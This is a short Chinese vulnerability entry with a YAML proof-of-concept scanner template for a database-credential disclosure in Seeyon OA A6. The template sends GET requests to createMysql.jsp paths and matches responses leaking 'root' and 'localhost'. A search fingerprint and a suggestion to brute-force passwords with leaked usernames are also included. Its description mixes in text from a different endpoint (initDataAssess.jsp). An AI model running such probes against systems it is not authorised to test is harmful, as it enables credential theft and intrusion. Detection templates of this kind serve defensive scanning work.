漏洞描述
致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击
title="致远A8+协同管理软件.A6"
seeyon-a6-createmysql-disclosure: 致远OA A6 createMysql.jsp 数据库敏感信息泄露
PoC代码[已公开]
id: seeyon-a6-createmysql-disclosure
info:
name: 致远OA A6 createMysql.jsp 数据库敏感信息泄露
author: zan8in
severity: medium
description: |
致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击
title="致远A8+协同管理软件.A6"
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20initDataAssess.jsp%20%E7%94%A8%E6%88%B7%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.html
rules:
r0:
request:
method: GET
path: /yyoa/createMysql.jsp
expression: response.status == 200 && response.body.bcontains(b'localhost') && response.body.bcontains(b'root') && response.body.bcontains(b'debugger')
r1:
request:
method: GET
path: /yyoa/ext/createMysql.jsp
expression: response.status == 200 && response.body.bcontains(b'localhost') && response.body.bcontains(b'root') && response.body.bcontains(b'debugger')
expression: r0() || r1()